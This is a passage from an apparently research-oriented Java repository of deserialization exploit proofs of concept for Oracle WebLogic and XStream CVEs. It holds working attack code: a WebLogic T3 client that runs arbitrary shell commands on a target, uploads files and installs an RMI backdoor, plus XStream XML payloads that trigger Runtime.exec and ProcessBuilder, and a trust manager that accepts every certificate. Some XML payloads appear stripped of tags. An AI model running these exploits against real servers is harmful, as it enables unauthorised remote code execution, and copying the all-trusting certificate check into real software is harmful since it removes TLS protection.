| 3 | import java.io.*; 4 | 5 | public class Serializables { 6 | 7 | public static byte[] serialize(final Object obj) throws IOException { 8 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 9 | serialize(obj, out); 10 | return out.toByteArray(); 11 | } 12 | 13 | public static void serialize(final Object obj, final OutputStream out) throws IOException { 14 | final ObjectOutputStream objOut = new ObjectOutputStream(out); 15 | objOut.writeObject(obj); 16 | objOut.flush(); 17 | objOut.close(); 18 | } 19 | 20 | public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { 21 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 22 | return deserialize(in); 23 | } 24 | 25 | public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { 26 | final ObjectInputStream objIn = new ObjectInputStream(in); 27 | return objIn.readObject(); 28 | } 29 | 30 | } -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/ssl/SocketFactory.java: -------------------------------------------------------------------------------- 1 | package com.supeream.ssl; 2 | 3 | import com.supeream.Main; 4 | 5 | import javax.net.ssl.SSLContext; 6 | import javax.net.ssl.SSLSocketFactory; 7 | import javax.net.ssl.TrustManager; 8 | import java.net.Socket; 9 | import java.security.SecureRandom; 10 | 11 | /** 12 | * Created by nike on 17/6/29. 13 | */ 14 | public class SocketFactory { 15 | private SocketFactory() { 16 | } 17 | 18 | public static Socket newSocket(String host, int port) throws Exception { 19 | Socket socket = null; 20 | try{ 21 | if (Main.cmdLine.hasOption("https")) { 22 | SSLContext context = SSLContext.getInstance("SSL"); 23 | // 初始化 24 | context.init(null, 25 | new TrustManager[]{new TrustManagerImpl()}, 26 | new SecureRandom()); 27 | SSLSocketFactory factory = context.getSocketFactory(); 28 | socket = factory.createSocket(host, port); 29 | } 30 | }catch (Exception e){ 31 | socket = new Socket(host, port); 32 | } 33 | 34 | return socket; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/ssl/TrustManagerImpl.java: -------------------------------------------------------------------------------- 1 | package com.supeream.ssl; 2 | 3 | import javax.net.ssl.X509TrustManager; 4 | import java.security.cert.CertificateException; 5 | import java.security.cert.X509Certificate; 6 | 7 | /** 8 | * Created by nike on 17/6/29. 9 | */ 10 | public class TrustManagerImpl implements X509TrustManager { 11 | 12 | @Override 13 | public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { 14 | } 15 | 16 | @Override 17 | public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { 18 | 19 | } 20 | 21 | @Override 22 | public X509Certificate[] getAcceptedIssuers() { 23 | return null; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/ssl/WeblogicTrustManager.java: -------------------------------------------------------------------------------- 1 | package com.supeream.ssl; 2 | 3 | import weblogic.security.SSL.TrustManager; 4 | 5 | import java.security.cert.X509Certificate; 6 | 7 | /** 8 | * Created by nike on 17/6/29. 9 | */ 10 | public class WeblogicTrustManager implements TrustManager { 11 | @Override 12 | public boolean certificateCallback(X509Certificate[] x509Certificates, int i) { 13 | return true; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/weblogic/BypassPayloadSelector.java: -------------------------------------------------------------------------------- 1 | package com.supeream.weblogic; 2 | 3 | import com.supeream.Main; 4 | import com.supeream.serial.Serializables; 5 | import weblogic.corba.utils.MarshalledObject; 6 | import weblogic.jms.common.StreamMessageImpl; 7 | 8 | import java.io.IOException; 9 | 10 | /** 11 | * Created by nike on 17/6/26. 12 | */ 13 | public class BypassPayloadSelector { 14 | 15 | private static Object marshalledObject(Object payload) { 16 | MarshalledObject marshalledObject = null; 17 | try { 18 | marshalledObject = new MarshalledObject(payload); 19 | } catch (IOException e) { 20 | e.printStackTrace(); 21 | } 22 | return marshalledObject; 23 | } 24 | 25 | 26 | public static Object streamMessageImpl(byte[] object) throws Exception { 27 | 28 | StreamMessageImpl streamMessage = new StreamMessageImpl(); 29 | streamMessage.setDataBuffer(object, object.length); 30 | return streamMessage; 31 | } 32 | 33 | public static Object selectBypass(Object payload) throws Exception { 34 | 35 | if (Main.TYPE.equalsIgnoreCase("marshall")) { 36 | payload = marshalledObject(payload); 37 | } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) { 38 | payload = streamMessageImpl(Serializables.serialize(payload)); 39 | } 40 | return payload; 41 | } 42 | 43 | 44 | } 45 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/weblogic/ObjectTest.java: -------------------------------------------------------------------------------- 1 | package com.supeream.weblogic; 2 | 3 | import com.supeream.serial.BytesOperation; 4 | 5 | import java.io.ByteArrayInputStream; 6 | import java.io.ByteArrayOutputStream; 7 | import java.io.ObjectInputStream; 8 | import java.io.ObjectOutputStream; 9 | 10 | /** 11 | * Created by nike on 17/7/11. 12 | */ 13 | public class ObjectTest { 14 | public static void main(String[] args) throws Exception { 15 | 16 | 17 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 18 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 19 | objectOutputStream.writeUTF("xxx"); 20 | String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray()); 21 | System.out.println(xx); 22 | byte[] cons = BytesOperation.hexStringToBytes(xx); 23 | 24 | 25 | 26 | ByteArrayInputStream bis = new ByteArrayInputStream(cons); 27 | ObjectInputStream objectInputStream = new ObjectInputStream(bis); 28 | objectInputStream.readObject(); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/weblogic/WebLogicOperation.java: -------------------------------------------------------------------------------- 1 | package com.supeream.weblogic; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import com.supeream.Main; 9 | import com.supeream.serial.SerialDataGenerator; 10 | 11 | public class WebLogicOperation { 12 | 13 | public static void installRmi(String host, String port) throws Exception { 14 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); 15 | T3ProtocolOperation.send(host, port, payload); 16 | } 17 | 18 | public static void unInstallRmi(String host, String port) throws Exception { 19 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"}); 20 | T3ProtocolOperation.send(host, port, payload); 21 | } 22 | 23 | public static void blind(String host, String port) throws Exception { 24 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")}); 25 | T3ProtocolOperation.send(host, port, payload); 26 | } 27 | 28 | public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception { 29 | byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content); 30 | T3ProtocolOperation.send(host, port, payload); 31 | } 32 | 33 | public static void blindExecute(String host, String port, String cmd) throws Exception { 34 | String[] cmds = new String[]{cmd}; 35 | if (Main.cmdLine.hasOption("os")) { 36 | if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) { 37 | cmds = new String[]{"/bin/bash", "-c", cmd}; 38 | } else { 39 | cmds = new String[]{"cmd.exe", "/c", cmd}; 40 | } 41 | } 42 | byte[] payload = SerialDataGenerator.serialBlindDatas(cmds); 43 | T3ProtocolOperation.send(host, port, payload); 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/Main.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14654.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14654.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14756.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14756.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14841.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_14841.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2555.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2555.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC1.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2020_2883_POC2.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2135.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2135.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2394.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/CVE_2021_2394.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/cve/ObjectPayload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/cve/ObjectPayload.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/payload/PayloadTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/payload/PayloadTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/payload/RemoteImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/payload/RemoteImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/BytesOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/BytesOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/Reflections.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/Reflections.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/SerialDataGenerator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/SerialDataGenerator.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/Serializables.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/Serializables.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/SocketFactory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/SocketFactory.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/ObjectTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/ObjectTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3ProtocolOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3ProtocolOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3Test.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/Main.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/payload/PayloadTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/payload/PayloadTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/payload/RemoteImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/payload/RemoteImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/BytesOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/BytesOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/Reflections.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/Reflections.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/SerialDataGenerator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/SerialDataGenerator.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/Serializables.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/Serializables.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/ssl/SocketFactory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/SocketFactory.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/ssl/TrustManagerImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/TrustManagerImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/ssl/WeblogicTrustManager.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/WeblogicTrustManager.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/BypassPayloadSelector.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/BypassPayloadSelector.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/ObjectTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/ObjectTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/T3ProtocolOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/T3ProtocolOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/T3Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/T3Test.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/WebLogicOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/WebLogicOperation.class -------------------------------------------------------------------------------- /xstream/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | xstream 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 6 20 | 6 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | com.thoughtworks.xstream 29 | xstream 30 | 1.4.16 31 | 32 | 33 | javassist 34 | javassist 35 | 3.12.1.GA 36 | compile 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/hashmap/CVE_2021_39152.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.hashmap; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | public class CVE_2021_39152 { 6 | public static void main(String[] args) { 7 | String xml = "\n" + 8 | " \n" + 9 | " \n" + 10 | " http://localhost:8080/internal/\n" + 11 | " GBK\n" + 12 | " 1111\n" + 13 | " b\n" + 14 | " 0\n" + 15 | " 0\n" + 16 | " \n" + 17 | " \n" + 18 | " \n" + 19 | " \n" + 20 | " \n" + 21 | " http://localhost:8080/internal/\n" + 22 | " \n" + 23 | " 1111\n" + 24 | " b\n" + 25 | " 0\n" + 26 | " 0\n" + 27 | " \n" + 28 | " \n" + 29 | " \n" + 30 | ""; 31 | XStream xstream = new XStream(); 32 | xstream.fromXML(xml); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.priorityqueue; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | import java.util.PriorityQueue; 6 | 7 | public class CVE_2021_39144 { 8 | public static void main(String[] args) { 9 | XStream xStream = new XStream(); 10 | // String xml = xStream.toXML(getpayloadObject()); 11 | String xml = "\n" + 12 | " \n" + 13 | " \n" + 14 | " \n" + 15 | " 2\n" + 16 | " \n" + 17 | " 3\n" + 18 | " \n" + 19 | " java.lang.Comparable\n" + 20 | " \n" + 21 | " true\n" + 22 | " java.lang.Comparable\n" + 23 | " \n" + 24 | " \n" + 25 | " \n" + 26 | " java.lang.Comparable\n" + 27 | " compareTo\n" + 28 | " \n" + 29 | " java.lang.Object\n" + 30 | " \n" + 31 | " \n" + 32 | " \n" + 33 | " \n" + 34 | " \n" + 35 | " java.lang.Runtime\n" + 36 | " exec\n" + 37 | " \n" + 38 | " java.lang.String\n" + 39 | " \n" + 40 | " \n" + 41 | " \n" + 42 | " \n" + 43 | " \n" + 44 | " \n" + 45 | " \n" + 46 | " calc\n" + 47 | " \n" + 48 | ""; 49 | xStream.fromXML(xml); 50 | } 51 | 52 | public static PriorityQueue getpayloadObject() { 53 | PriorityQueue priorityQueue = new PriorityQueue(); 54 | return priorityQueue; 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/priorityqueue/test.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.priorityqueue; 2 | 3 | public class test { 4 | public static void main(String[] args) throws ClassNotFoundException { 5 | String xml = "\n" + 6 | "test-view\n" + 7 | "用于测试的视图1111\n" + 8 | "false\n" + 9 | "false\n" + 10 | "\n" + 11 | "\n" + 12 | "\n" + 13 | "\n" + 14 | "\n" + 15 | "\n" + 16 | "\n" + 17 | "\n" + 18 | "\n" + 19 | "\n" + 20 | "\n" + 21 | "\n" + 22 | "\n" + 23 | "\n" + 24 | "\n" + 25 | "false\n" + 26 | ""; 27 | System.out.println(xml); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/sortedset/CVE_2019_10173.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.sortedset; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | import java.io.IOException; 6 | 7 | //XStream <=1.4.6和1.4.10 8 | 9 | public class CVE_2019_10173 { 10 | // public static String expGen(){ 11 | // XStream xstream = new XStream(); 12 | // Set set = new TreeSet(); 13 | // set.add("foo"); 14 | // set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start")); 15 | // String payload = xstream.toXML(set); 16 | // System.out.println(payload); 17 | // return payload; 18 | // } 19 | public static void main(String[] args) throws IOException { 20 | // expGen(); 21 | XStream xStream = new XStream(); 22 | String payload = "\n" + 23 | " foo\n" + 24 | " \n" + 25 | " java.lang.Comparable\n" + 26 | " \n" + 27 | " \n" + 28 | " \n" + 29 | " cmd.exe\n" + 30 | " /c\n" + 31 | " calc\n" + 32 | " \n" + 33 | " \n" + 34 | " start"+ 35 | " \n" + 36 | " \n" + 37 | "\n"; 38 | xStream.fromXML(payload); 39 | } 40 | } -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/test/School.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.test; 2 | 3 | public class School { 4 | private String name; 5 | private int classNum; 6 | 7 | public School(String name, int classNum) { 8 | this.name = name; 9 | this.classNum = classNum; 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/test/Student.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.test; 2 | 3 | import java.io.IOException; 4 | import java.io.Serializable; 5 | 6 | public class Student implements Serializable { 7 | private String name; 8 | private int age; 9 | private School school; 10 | 11 | public Student(String name, int age, School school) { 12 | this.name = name; 13 | this.age = age; 14 | this.school = school; 15 | } 16 | 17 | private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException { 18 | s.defaultReadObject(); 19 | System.out.println("XML反序列化"); 20 | } 21 | private void writeObject(java.io.ObjectOutputStream s) throws IOException, ClassNotFoundException { 22 | s.defaultWriteObject(); 23 | System.out.println("XML序列化"); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/test/Test.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.test; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | import java.lang.reflect.InvocationHandler; 6 | import java.lang.reflect.Method; 7 | import java.lang.reflect.Proxy; 8 | 9 | public class Test { 10 | public static void main(String[] args) { 11 | XStream xStream = new XStream(); 12 | Student people = new Student("xiaoming", 25, new School("北京大学", 500)); 13 | String xml = xStream.toXML(people); 14 | System.out.println(xml); 15 | Student object = (Student) xStream.fromXML(xml); 16 | 17 | InvocationHandler handler = new InvocationHandler() { 18 | @Override 19 | public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { 20 | return "这里是代理方法"; 21 | } 22 | }; 23 | // proxy必须以代理类的接口作为类型,否则会报错 24 | TestInterface proxy = (TestInterface) Proxy.newProxyInstance(ImpTest.class.getClassLoader(), ImpTest.class.getInterfaces(), handler); 25 | String proxyStr = xStream.toXML(proxy); 26 | System.out.println(proxyStr); 27 | // xStream.fromXML(proxyStr); 28 | 29 | } 30 | } 31 | 32 | interface TestInterface { 33 | public String test(); 34 | 35 | public String test1(String a); 36 | } 37 | 38 | class ImpTest implements TestInterface { 39 | 40 | @Override 41 | public String test() { 42 | return "这里是被代理类的方法"; 43 | } 44 | 45 | @Override 46 | public String test1(String a) { 47 | return "这里是被代理类的方法1111" + a; 48 | } 49 | } -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/eventlistenerlist/CVE_2021_39151.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/eventlistenerlist/CVE_2021_39151.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2020_26217.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2020_26217.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2021_39152.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2021_39152.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39139.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39139.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39140.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39140.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39149.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39149.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21344.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21344.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21345.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21345.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39141.class: 